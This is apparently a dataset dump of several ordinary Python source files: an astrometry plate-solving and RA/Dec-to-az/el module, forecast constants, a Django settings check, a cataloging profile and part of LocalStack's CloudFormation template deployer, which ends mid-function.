hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
83d488207b28894daff8275af6a62362232de84e | 5,373 | py | Python | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 6 | 2019-08-14T08:40:13.000Z | 2022-03-17T08:28:43.000Z | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 2 | 2015-11-30T01:46:00.000Z | 2015-11-30T01:46:13.000Z | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 1 | 2018-10-26T02:39:32.000Z | 2018-10-26T02:39:32.000Z | from __future__ import annotations
from pathlib import Path
import subprocess
import shutil
import logging
import warnings
from dateutil.parser import parse
from datetime import datetime
from numpy import meshgrid, column_stack
import xarray
from astropy.io import fits # instead of obsolete pyfits
from astropy.wcs import wcs
try:
import pymap3d
except ImportError:
pymap3d = None
def fits2radec(
    fitsfn: Path, WCSfn: Path = None, solve: bool = False, args: str = None
) -> xarray.Dataset:
    """Register each pixel of a FITS image to sky coordinates (right ascension / declination).

    Parameters
    ----------
    fitsfn : Path
        FITS image (.fits / .new) or WCS solution file (.wcs)
    WCSfn : Path, optional
        WCS solution file; derived from fitsfn if not given
    solve : bool
        if True, run astrometry.net "solve-field" on the image first
    args : str
        extra command-line arguments forwarded to solve-field

    Returns
    -------
    xarray.Dataset with "ra" and "dec" 2-D arrays over pixel coordinates (y, x),
    or None if the image could not be solved / no WCS file is found.
    """
    fitsfn = Path(fitsfn).expanduser()
    if WCSfn is None:
        if fitsfn.suffix in (".fits", ".new"):
            # using .wcs will also work but gives a spurious warning
            WCSfn = fitsfn.with_suffix(".wcs")
        elif fitsfn.suffix == ".wcs":
            WCSfn = fitsfn
        else:
            raise ValueError(f"please convert {fitsfn} to GRAYSCALE .fits")
    else:
        # BUG FIX: callers may pass a plain str; .is_file()/.parent below require a Path
        WCSfn = Path(WCSfn).expanduser()
    if solve:
        if not doSolve(fitsfn, args):
            logging.error(f"{fitsfn} was not solved")
            return None
    if not WCSfn.is_file():
        # some pipelines emit "<stem>_stack.wcs" instead; try that before giving up
        WCSfn = WCSfn.parent / (WCSfn.stem + "_stack.wcs")
    if not WCSfn.is_file():
        logging.error(f"it appears {fitsfn} was not solved as {WCSfn} is not found")
        return None
    with fits.open(fitsfn, mode="readonly") as f:
        yPix, xPix = f[0].shape[-2:]
    x, y = meshgrid(range(xPix), range(yPix))  # pixel indices to find RA/dec of
    xy = column_stack((x.ravel(order="C"), y.ravel(order="C")))
    # %% use astropy.wcs to register pixels to RA/DEC
    """
    http://docs.astropy.org/en/stable/api/astropy.wcs.WCS.html#astropy.wcs.WCS
    naxis=[0,1] is to take x,y axes in case a color photo was input e.g. to astrometry.net cloud solver
    """
    with fits.open(WCSfn, mode="readonly") as f:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            radec = wcs.WCS(f[0].header).all_pix2world(xy, 0)
    # radec = wcs.WCS(hdul[0].header,naxis=[0,1]).all_pix2world(xy, 0)
    ra = radec[:, 0].reshape((yPix, xPix), order="C")
    dec = radec[:, 1].reshape((yPix, xPix), order="C")
    # %% collect output
    radec = xarray.Dataset(
        {"ra": (("y", "x"), ra), "dec": (("y", "x"), dec)},
        {"x": range(xPix), "y": range(yPix)},
        attrs={"filename": str(fitsfn)},
    )
    return radec
def radec2azel(
    scale: xarray.Dataset, latlon: tuple[float, float], time: datetime
) -> xarray.Dataset:
    """Convert per-pixel RA/Dec to azimuth/elevation for an observer location and time.

    Parameters
    ----------
    scale : xarray.Dataset
        output of fits2radec() containing "ra" and "dec" arrays
    latlon : tuple[float, float]
        observer (latitude, longitude) in degrees
    time : datetime | float | int | str | None
        frame time; None reads the FITS "FRAME" header, numbers are treated
        as Unix UT1 timestamps, strings are parsed

    Returns
    -------
    the input Dataset augmented with "az"/"el" arrays and lat/lon/time attrs,
    or None if prerequisites are missing.
    """
    if pymap3d is None:
        logging.error("azimuth, elevation computations require: pip install pymap3d")
        return None
    if latlon is None:
        return None
    if not isinstance(scale, xarray.Dataset):
        return None
    if time is None:
        with fits.open(scale.filename, mode="readonly") as f:
            try:
                t = f[0].header["FRAME"]  # TODO this only works from Solis?
            except KeyError:
                return None
        time = parse(t)
        logging.info("using FITS header for time")
    elif isinstance(time, datetime):
        pass
    elif isinstance(time, (float, int)):  # assume UT1_Unix
        time = datetime.utcfromtimestamp(time)
    else:  # user override of frame time
        time = parse(time)
    print("image time:", time)
    # %% knowing camera location, time, and sky coordinates observed, convert to az/el for each pixel
    # .values is to avoid silently freezing AstroPy
    az, el = pymap3d.radec2azel(scale["ra"].values, scale["dec"].values, *latlon, time)
    if (el < 0).any():
        # BUG FIX: .nonzero() returns a tuple of index arrays; .sum() gives the count
        Nbelow = int((el < 0).sum())
        logging.error(
            f"{Nbelow} points were below the horizon."
            "Currently this program assumed observer ~ ground level."
            "Please file a bug report if you need observer off of Earth surface"
        )
    # %% collect output
    scale["az"] = (("y", "x"), az)
    scale["el"] = (("y", "x"), el)
    scale.attrs["lat"] = latlon[0]
    scale.attrs["lon"] = latlon[1]
    scale.attrs["time"] = time
    return scale
def doSolve(fitsfn: Path, args: str = None) -> bool:
    """Run astrometry.net "solve-field" on a FITS image.

    Parameters
    ----------
    fitsfn : Path
        FITS file to plate-solve
    args : str | None
        extra space-separated command-line options for solve-field

    Returns
    -------
    True if the solver reported success, False otherwise.
    Writes the command and solver output to "<fitsfn stem>.log".

    Astrometry.net from at least version 0.67 is OK with Python 3.
    """
    solve = shutil.which("solve-field")
    if not solve:
        # BUG FIX: message said "solve-file exectuable"
        raise FileNotFoundError("Astrometry.net solve-field executable not found")
    if isinstance(args, str):
        opts = args.split(" ")
    elif args is None:
        # BUG FIX: previously assigned "args = []", leaving "opts" undefined below (NameError)
        opts = []
    else:
        opts = list(args)
    # %% build command
    cmd = [solve, "--overwrite", str(fitsfn)]
    cmd += opts
    print("\n", " ".join(cmd), "\n")
    # %% execute
    ret = subprocess.check_output(cmd, universal_newlines=True)
    # solve-field returns 0 even if it didn't solve!
    print(ret)
    fitsfn.with_suffix(".log").write_text(" ".join(cmd) + "\n\n" + ret)
    if "Did not solve" in ret:
        logging.error(f"could not solve {fitsfn}")
        return False
    else:
        return True
def fits2azel(
    fitsfn: Path,
    *,
    wcsfn: Path = None,
    latlon: tuple[float, float] = None,
    time: datetime = None,
    solve: bool = False,
    args: str = None,
) -> xarray.Dataset:
    """Plate-solve a FITS image and map each pixel to azimuth/elevation.

    Runs fits2radec() first; when an observer location/time is available,
    augments the result with az/el via radec2azel(). Returns None if the
    image could not be registered, or the plain RA/Dec dataset when az/el
    cannot be computed.
    """
    radec = fits2radec(Path(fitsfn).expanduser(), wcsfn, solve, args)
    if radec is None:
        return None
    # if az/el can be computed, scale is implicitly merged with radec.
    azel = radec2azel(radec, latlon, time)
    return radec if azel is None else azel
| 31.421053 | 103 | 0.607854 |
085d24dfe8b6b9cd9d2c556eaee5a770b0f7ec31 | 478 | py | Python | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | null | null | null | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | null | null | null | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | 2 | 2022-03-20T10:30:38.000Z | 2022-03-22T06:39:14.000Z | DATA = 'data/'
RESULTS = 'results/'
# a dictionary including all information relevant to the forecast horizon and resolution
HORIZON_INFO = {
    '1D': {  # one-day-ahead forecast horizon
        'resolution': 'H',  # pandas offset alias: hourly
        'horizon_as_int': 24,  # number of steps in the horizon (24 hours)
        'resolution_as_str': '1H',
        'seasonality': 24,  # seasonal period in steps (daily cycle)
        'arima_params': {
            'seasonal_freq': 24,
            'seasonality': False,
            'fourier': True,  # NOTE(review): seasonality appears handled via Fourier terms — confirm
            'fourier_terms': None,
            'maxiter': None,
        }
    }
}
| 23.9 | 88 | 0.527197 |
e55ad886ce15434ffc995a6675a5cdabe4ceb8f2 | 1,197 | py | Python | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """Mongo osid profile elements for cataloging service packages"""
# -*- coding: utf-8 -*-
# pylint: disable=unused-import
# importing common values to be used by cataloging.ProfileManger implementation
from ..profile import ID
from ..profile import LANGUAGETYPE
from ..profile import SCRIPTTYPE
from ..profile import FORMATTYPE
from ..profile import VERSIONSCHEME
from ..profile import LOCALES
from ..profile import LICENSE
from ..profile import PROVIDERID
from ..profile import OSIDVERSION
DISPLAYNAME = 'Mongo cataloging'
DESCRIPTION = 'MongoDB based cataloging implementation'
VERSIONCOMPONENTS = [0, 1, 45]
RELEASEDATE = "2018-03-08"
SUPPORTS = [ # 'Remove the # when implementations exist:'
# 'supports_journal_rollback',
# 'supports_journal_branching',
# 'supports_visible_federation',
# 'supports_catalog',
# 'supports_catalog_assignment',
# 'supports_catalog_entry_notification',
'supports_catalog_lookup',
'supports_catalog_query',
# 'supports_catalog_search',
'supports_catalog_admin',
# 'supports_catalog_notification',
'supports_catalog_hierarchy',
'supports_catalog_hierarchy_design',
# 'supports_cataloging_rules',
]
| 29.925 | 82 | 0.754386 |
c0d8d0a779b605271fd586adcd529e8b9e628821 | 1,052 | py | Python | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 123 | 2015-01-15T06:56:45.000Z | 2022-03-19T22:18:55.000Z | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 21 | 2015-03-25T18:00:33.000Z | 2019-08-12T17:11:10.000Z | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 72 | 2015-01-14T16:29:47.000Z | 2021-10-09T16:31:47.000Z | from __future__ import unicode_literals
from django.conf import global_settings, settings
from .. import Tags, Warning, register
@register(Tags.compatibility)
def check_duplicate_template_settings(app_configs, **kwargs):
    """Warn when deprecated standalone TEMPLATE_* settings are overridden while TEMPLATES is set."""
    if not settings.TEMPLATES:
        return []
    deprecated_names = (
        'TEMPLATE_DIRS',
        'ALLOWED_INCLUDE_ROOTS',
        'TEMPLATE_CONTEXT_PROCESSORS',
        'TEMPLATE_DEBUG',
        'TEMPLATE_LOADERS',
        'TEMPLATE_STRING_IF_INVALID',
    )
    # a setting counts as overridden when it differs from the global default
    overridden = [
        name for name in deprecated_names
        if getattr(settings, name) != getattr(global_settings, name)
    ]
    if not overridden:
        return []
    return [Warning(
        "The standalone TEMPLATE_* settings were deprecated in Django "
        "1.8 and the TEMPLATES dictionary takes precedence. You must "
        "put the values of the following settings into your default "
        "TEMPLATES dict: %s." % ", ".join(overridden),
        id='1_8.W001',
    )]
| 32.875 | 79 | 0.595057 |
f37b7d7fe28b041512a178366e7c817fbfe35c34 | 86,125 | py | Python | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | import re
import os
import json
import base64
import logging
import traceback
from urllib.parse import urlparse
from six import iteritems
from moto.ec2.utils import generate_route_id
from moto.core import CloudFormationModel as MotoCloudFormationModel
from moto.cloudformation import parsing
from moto.cloudformation.models import cloudformation_backends
from localstack import config
from localstack.utils import common
from localstack.utils.aws import aws_stack
from localstack.constants import TEST_AWS_ACCOUNT_ID, FALSE_STRINGS
from localstack.services.s3 import s3_listener
from localstack.utils.common import (
json_safe, md5, canonical_json, short_uid, to_str, to_bytes,
mkdir, cp_r, prevent_stack_overflow, start_worker_thread, get_all_subclasses)
from localstack.utils.testutil import create_zip_file, delete_all_s3_objects
from localstack.utils.cloudformation import template_preparer
from localstack.services.awslambda.lambda_api import get_handler_file_from_name
from localstack.services.cloudformation.service_models import GenericBaseModel, DependencyNotYetSatisfied
from localstack.services.cloudformation.deployment_utils import (
dump_json_params, select_parameters, param_defaults, remove_none_values, get_cfn_response_mod_file,
lambda_keys_to_lower, PLACEHOLDER_AWS_NO_VALUE, PLACEHOLDER_RESOURCE_NAME)
ACTION_CREATE = 'create'
ACTION_DELETE = 'delete'
AWS_URL_SUFFIX = 'localhost' # value is "amazonaws.com" in real AWS
IAM_POLICY_VERSION = '2012-10-17'
LOG = logging.getLogger(__name__)
# list of resource types that can be updated
# TODO: make this a property of the model classes themselves
UPDATEABLE_RESOURCES = [
'Lambda::Function', 'ApiGateway::Method', 'StepFunctions::StateMachine', 'IAM::Role', 'EC2::Instance'
]
# list of static attribute references to be replaced in {'Fn::Sub': '...'} strings
STATIC_REFS = ['AWS::Region', 'AWS::Partition', 'AWS::StackName', 'AWS::AccountId']
# maps resource type string to model class
RESOURCE_MODELS = {model.cloudformation_type(): model for model in get_all_subclasses(GenericBaseModel)}
class NoStackUpdates(Exception):
""" Exception indicating that no actions are to be performed in a stack update (which is not allowed) """
pass
def lambda_get_params():
    """Return a pass-through parameter mapper (identity on the params dict)."""
    def identity(params, **kwargs):
        return params
    return identity
def rename_params(func, rename_map):
    """Wrap a parameter mapper, renaming result keys per rename_map (old -> new).

    If func is None, the input params dict is used directly. Missing source
    keys map to None under the new name.
    """
    def renamed(params, **kwargs):
        mapped = params if func is None else func(params, **kwargs)
        for source_key, target_key in rename_map.items():
            mapped[target_key] = mapped.pop(source_key, None)
        return mapped
    return renamed
def get_lambda_code_param(params, **kwargs):
    """Return the Code parameter for lambda:CreateFunction, packaging inline source.

    When Code.ZipFile contains plain (non-base64) source code, it is written to
    a temp handler file, bundled together with the Node.js 'cfn-response' helper
    module, zipped, and the zip content replaces ZipFile. Base64 (already-zipped)
    content is passed through unchanged.
    """
    code = params.get('Code', {})
    zip_file = code.get('ZipFile')
    if zip_file and not common.is_base64(zip_file):
        tmp_dir = common.new_tmp_dir()
        # handler file name depends on the runtime (e.g. index.js, handler.py)
        handler_file = get_handler_file_from_name(params['Handler'], runtime=params['Runtime'])
        tmp_file = os.path.join(tmp_dir, handler_file)
        common.save_file(tmp_file, zip_file)
        # add 'cfn-response' module to archive - see:
        # https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-lambda-function-code-cfnresponsemodule.html
        cfn_response_tmp_file = get_cfn_response_mod_file()
        cfn_response_mod_dir = os.path.join(tmp_dir, 'node_modules', 'cfn-response')
        mkdir(cfn_response_mod_dir)
        cp_r(cfn_response_tmp_file, os.path.join(cfn_response_mod_dir, 'index.js'))
        # create zip file
        zip_file = create_zip_file(tmp_dir, get_content=True)
        code['ZipFile'] = zip_file
        common.rm_rf(tmp_dir)
    return code
def events_put_rule_params(params, **kwargs):
    """Build parameters for events:PutRule from an Events::Rule resource.

    Defaults the rule Name to the resource-name placeholder, and serializes
    EventPattern to a JSON string after wrapping scalar values in single-element
    lists (the Events API expects list-valued pattern entries).
    """
    attrs = ['ScheduleExpression', 'EventPattern', 'State', 'Description', 'Name']
    result = select_parameters(*attrs)(params, **kwargs)
    result['Name'] = result.get('Name') or PLACEHOLDER_RESOURCE_NAME
    def wrap_in_lists(o, **kwargs):
        # applied recursively to each dict: wrap non-dict/non-list values in a list
        if isinstance(o, dict):
            for k, v in o.items():
                if not isinstance(v, (dict, list)):
                    o[k] = [v]
        return o
    pattern = result.get('EventPattern')
    if isinstance(pattern, dict):
        wrapped = common.recurse_object(pattern, wrap_in_lists)
        result['EventPattern'] = json.dumps(wrapped)
    return result
def es_add_tags_params(params, **kwargs):
    """Build parameters for es:AddTags from an Elasticsearch::Domain resource."""
    return {
        'ARN': aws_stack.es_domain_arn(params.get('DomainName')),
        'TagList': params.get('Tags', []),
    }
def lambda_permission_params(params, **kwargs):
    """Build parameters for lambda:AddPermission, generating a random StatementId."""
    result = select_parameters('FunctionName', 'Action', 'Principal')(params, **kwargs)
    result['StatementId'] = common.short_uid()
    return result
def get_ddb_provisioned_throughput(params, **kwargs):
    """Extract ProvisionedThroughput for dynamodb:CreateTable, coercing capacity units to int.

    Returns {} for the AWS::NoValue placeholder; a falsy value (e.g. None)
    is returned unchanged.
    """
    throughput = params.get('ProvisionedThroughput')
    if throughput == PLACEHOLDER_AWS_NO_VALUE:
        return {}
    if not throughput:
        return throughput
    for key in ('ReadCapacityUnits', 'WriteCapacityUnits'):
        if isinstance(throughput[key], str):
            throughput[key] = int(throughput[key])
    return throughput
def get_ddb_global_sec_indexes(params, **kwargs):
    """Extract GlobalSecondaryIndexes for dynamodb:CreateTable, coercing capacity units to int.

    BUG FIX: previously assumed every index carries ProvisionedThroughput and
    raised KeyError otherwise; indexes without it (e.g. PAY_PER_REQUEST billing
    mode) are now passed through unchanged.

    Returns None when the parameter is absent.
    """
    indexes = params.get('GlobalSecondaryIndexes')
    if indexes:
        for index in indexes:
            throughput = index.get('ProvisionedThroughput')
            if not throughput:
                continue  # on-demand billing: no provisioned throughput to normalize
            for key in ('ReadCapacityUnits', 'WriteCapacityUnits'):
                if isinstance(throughput[key], str):
                    throughput[key] = int(throughput[key])
    return indexes
def get_apigw_resource_params(params, **kwargs):
    """Build parameters for apigateway:CreateResource.

    If no ParentId is given, looks up the REST API's root resource ("/")
    and uses its id as the parent.
    """
    result = {
        'restApiId': params.get('RestApiId'),
        'pathPart': params.get('PathPart'),
        'parentId': params.get('ParentId')
    }
    if not result.get('parentId'):
        # get root resource id
        apigw = aws_stack.connect_to_service('apigateway')
        resources = apigw.get_resources(restApiId=result['restApiId'])['items']
        root_resource = ([r for r in resources if r['path'] == '/'] or [None])[0]
        if not root_resource:
            raise Exception('Unable to find root resource for REST API %s' % result['restApiId'])
        result['parentId'] = root_resource['id']
    return result
# maps resource types to functions and parameters for creation
RESOURCE_TO_FUNCTION = {
'S3::BucketPolicy': {
'create': {
'function': 'put_bucket_policy',
'parameters': rename_params(dump_json_params(None, 'PolicyDocument'), {'PolicyDocument': 'Policy'})
}
},
'SecretsManager::Secret': {
'create': {
'function': 'create_secret',
'parameters': select_parameters('Name', 'Description', 'SecretString', 'KmsKeyId', 'Tags')
},
'delete': {
'function': 'delete_secret',
'parameters': {
'SecretId': 'Name'
}
}
},
'KinesisFirehose::DeliveryStream': {
'create': {
'function': 'create_delivery_stream',
'parameters': select_parameters('DeliveryStreamName', 'DeliveryStreamType',
'S3DestinationConfiguration', 'ElasticsearchDestinationConfiguration')
},
'delete': {
'function': 'delete_delivery_stream',
'parameters': {
'DeliveryStreamName': 'DeliveryStreamName'
}
}
},
'Elasticsearch::Domain': {
'create': [{
'function': 'create_elasticsearch_domain',
'parameters': select_parameters('AccessPolicies', 'AdvancedOptions', 'CognitoOptions',
'DomainName', 'EBSOptions', 'ElasticsearchClusterConfig', 'ElasticsearchVersion',
'EncryptionAtRestOptions', 'LogPublishingOptions', 'NodeToNodeEncryptionOptions',
'SnapshotOptions', 'VPCOptions')
}, {
'function': 'add_tags',
'parameters': es_add_tags_params
}],
'delete': {
'function': 'delete_elasticsearch_domain',
'parameters': {
'DomainName': 'DomainName'
}
}
},
'Logs::LogGroup': {
'create': {
'function': 'create_log_group',
'parameters': {
'logGroupName': 'LogGroupName'
}
},
'delete': {
'function': 'delete_log_group',
'parameters': {
'logGroupName': 'LogGroupName'
}
}
},
'Lambda::Function': {
'create': {
'function': 'create_function',
'parameters': {
'FunctionName': 'FunctionName',
'Runtime': 'Runtime',
'Role': 'Role',
'Handler': 'Handler',
'Code': get_lambda_code_param,
'Description': 'Description',
'Environment': 'Environment',
'Timeout': 'Timeout',
'MemorySize': 'MemorySize',
# TODO add missing fields
},
'defaults': {
'Role': 'test_role'
},
'types': {
'Timeout': int,
'MemorySize': int
}
},
'delete': {
'function': 'delete_function',
'parameters': {
'FunctionName': 'PhysicalResourceId'
}
}
},
'Lambda::Version': {
'create': {
'function': 'publish_version',
'parameters': select_parameters('FunctionName', 'CodeSha256', 'Description')
}
},
'Lambda::Permission': {
'create': {
'function': 'add_permission',
'parameters': lambda_permission_params
}
},
'Lambda::EventSourceMapping': {
'create': {
'function': 'create_event_source_mapping',
'parameters': select_parameters('FunctionName', 'EventSourceArn', 'Enabled',
'StartingPosition', 'BatchSize', 'StartingPositionTimestamp')
}
},
'DynamoDB::Table': {
'create': {
'function': 'create_table',
'parameters': {
'TableName': 'TableName',
'AttributeDefinitions': 'AttributeDefinitions',
'KeySchema': 'KeySchema',
'ProvisionedThroughput': get_ddb_provisioned_throughput,
'LocalSecondaryIndexes': 'LocalSecondaryIndexes',
'GlobalSecondaryIndexes': get_ddb_global_sec_indexes,
'StreamSpecification': lambda params, **kwargs: (
common.merge_dicts(params.get('StreamSpecification'), {'StreamEnabled': True}, default=None))
},
'defaults': {
'ProvisionedThroughput': {
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
}
}
},
'delete': {
'function': 'delete_table',
'parameters': {
'TableName': 'TableName'
}
}
},
'Events::EventBus': {
'create': {
'function': 'create_event_bus',
'parameters': {
'Name': 'Name'
}
},
'delete': {
'function': 'delete_event_bus',
'parameters': {
'Name': 'Name'
}
}
},
'Events::Rule': {
'create': [{
'function': 'put_rule',
'parameters': events_put_rule_params
}, {
'function': 'put_targets',
'parameters': {
'Rule': PLACEHOLDER_RESOURCE_NAME,
'EventBusName': 'EventBusName',
'Targets': 'Targets'
}
}],
'delete': {
'function': 'delete_rule',
'parameters': {
'Name': 'PhysicalResourceId'
}
}
},
'IAM::Role': {
'create': {
'function': 'create_role',
'parameters':
param_defaults(
dump_json_params(
select_parameters('Path', 'RoleName', 'AssumeRolePolicyDocument',
'Description', 'MaxSessionDuration', 'PermissionsBoundary', 'Tags'),
'AssumeRolePolicyDocument'),
{'RoleName': PLACEHOLDER_RESOURCE_NAME})
},
'delete': {
'function': 'delete_role',
'parameters': {
'RoleName': 'RoleName'
}
}
},
'ApiGateway::Resource': {
'create': {
'function': 'create_resource',
'parameters': get_apigw_resource_params
}
},
'ApiGateway::Method': {
'create': {
'function': 'put_method',
'parameters': {
'restApiId': 'RestApiId',
'resourceId': 'ResourceId',
'httpMethod': 'HttpMethod',
'authorizationType': 'AuthorizationType',
'authorizerId': 'AuthorizerId',
'requestParameters': 'RequestParameters'
}
}
},
'ApiGateway::Method::Integration': {
},
'ApiGateway::Account': {
},
'ApiGateway::Stage': {
'create': {
'function': 'create_stage',
'parameters': lambda_keys_to_lower()
}
},
'ApiGateway::Model': {
'create': {
'function': 'create_model',
'parameters': {
'name': 'Name',
'restApiId': 'RestApiId',
},
'defaults': {
'contentType': 'application/json'
}
}
},
'ApiGateway::Deployment': {
'create': {
'function': 'create_deployment',
'parameters': {
'restApiId': 'RestApiId',
'stageName': 'StageName',
'stageDescription': 'StageDescription',
'description': 'Description'
}
}
},
'ApiGateway::GatewayResponse': {
'create': {
'function': 'put_gateway_response',
'parameters': {
'restApiId': 'RestApiId',
'responseType': 'ResponseType',
'statusCode': 'StatusCode',
'responseParameters': 'ResponseParameters',
'responseTemplates': 'ResponseTemplates'
}
}
},
'Kinesis::Stream': {
'create': {
'function': 'create_stream',
'parameters': {
'StreamName': 'Name',
'ShardCount': 'ShardCount'
},
'defaults': {
'ShardCount': 1
}
},
'delete': {
'function': 'delete_stream',
'parameters': {
'StreamName': 'Name'
}
}
},
'StepFunctions::StateMachine': {
'create': {
'function': 'create_state_machine',
'parameters': {
'name': ['StateMachineName', PLACEHOLDER_RESOURCE_NAME],
'definition': 'DefinitionString',
'roleArn': lambda params, **kwargs: get_role_arn(params.get('RoleArn'), **kwargs)
}
},
'delete': {
'function': 'delete_state_machine',
'parameters': {
'stateMachineArn': 'PhysicalResourceId'
}
}
},
'StepFunctions::Activity': {
'create': {
'function': 'create_activity',
'parameters': {
'name': ['Name', PLACEHOLDER_RESOURCE_NAME],
'tags': 'Tags'
}
},
'delete': {
'function': 'delete_activity',
'parameters': {
'activityArn': 'PhysicalResourceId'
}
}
},
'EC2::Instance': {
'create': {
'function': 'create_instances',
'parameters': {
'InstanceType': 'InstanceType',
'SecurityGroups': 'SecurityGroups',
'KeyName': 'KeyName',
'ImageId': 'ImageId'
},
'defaults': {
'MinCount': 1,
'MaxCount': 1
}
},
'delete': {
'function': 'terminate_instances',
'parameters': {
'InstanceIds': lambda params, **kw: [kw['resources'][kw['resource_id']]['PhysicalResourceId']]
}
}
}
}
# ----------------
# UTILITY METHODS
# ----------------
def get_secret_arn(secret_name, account_id=None):
    """Return the ARN of a Secrets Manager secret, looked up by name.

    Queries the secretsmanager starter's in-memory ARN table, first with a
    region-prefixed key, then with the plain secret name. `account_id` is
    currently unused.
    """
    # TODO: create logic to create static without lookup table!
    from localstack.services.secretsmanager import secretsmanager_starter
    storage = secretsmanager_starter.SECRET_ARN_STORAGE
    key = '%s_%s' % (aws_stack.get_region(), secret_name)
    return storage.get(key) or storage.get(secret_name)
def retrieve_topic_arn(topic_name):
    """Look up the ARN of an SNS topic by its name (raises IndexError if absent)."""
    sns_client = aws_stack.connect_to_service('sns')
    matching = [
        t['TopicArn'] for t in sns_client.list_topics()['Topics']
        if t['TopicArn'].endswith(':%s' % topic_name)
    ]
    return matching[0]
def get_role_arn(role_arn, **kwargs):
    """Resolve intrinsic references in *role_arn* and return a full IAM role ARN.

    Expects 'stack_name' and 'resources' in kwargs for reference resolution.
    """
    role_arn = resolve_refs_recursively(kwargs.get('stack_name'), role_arn, kwargs.get('resources'))
    return aws_stack.role_arn(role_arn)
def find_stack(stack_name):
    """Look up a CloudFormation stack by name via the API module.

    Local import — presumably to avoid a circular dependency at module load time.
    """
    from localstack.services.cloudformation.cloudformation_api import find_stack as api_find_stack
    return api_find_stack(stack_name)
# ---------------------
# CF TEMPLATE HANDLING
# ---------------------
def get_deployment_config(res_type):
    """Return the create/delete function templates for a resource type.

    Checks the static RESOURCE_TO_FUNCTION map first, then falls back to the
    resource model class's get_deploy_templates(). Returns None for unknown types.
    """
    result = RESOURCE_TO_FUNCTION.get(res_type)
    if result is not None:
        return result
    canonical_type = canonical_resource_type(res_type)
    resource_class = RESOURCE_MODELS.get(canonical_type)
    if resource_class:
        return resource_class.get_deploy_templates()
def get_resource_type(resource):
    """Return the resource type with the leading vendor prefix stripped.

    e.g. {'Type': 'AWS::S3::Bucket'} -> 'S3::Bucket'; a type without '::'
    (e.g. 'Parameter') is returned unchanged.
    """
    full_type = resource.get('ResourceType') or resource.get('Type') or ''
    prefix, separator, remainder = full_type.partition('::')
    return remainder if separator else full_type
def get_service_name(resource):
    """Map a CloudFormation resource type to the boto service name that backs it.

    Returns None when the type has no '::'-delimited service component.
    """
    res_type = resource.get('Type', resource.get('ResourceType', ''))
    parts = res_type.split('::')
    if len(parts) == 1:
        return None
    if res_type.endswith('Cognito::UserPool'):
        return 'cognito-idp'
    # CFN service names that differ from the corresponding boto client names
    special_cases = {
        'Cognito': 'cognito-idp',
        'Elasticsearch': 'es',
        'KinesisFirehose': 'firehose',
    }
    service = parts[-2]
    if service in special_cases:
        return special_cases[service]
    return parts[1].lower()
def get_resource_name(resource):
    """Return the name of a resource: its Name property, or the name derived by its model class.

    Returns None (after logging) when neither yields a name.
    """
    properties = resource.get('Properties') or {}
    name = properties.get('Name')
    if name:
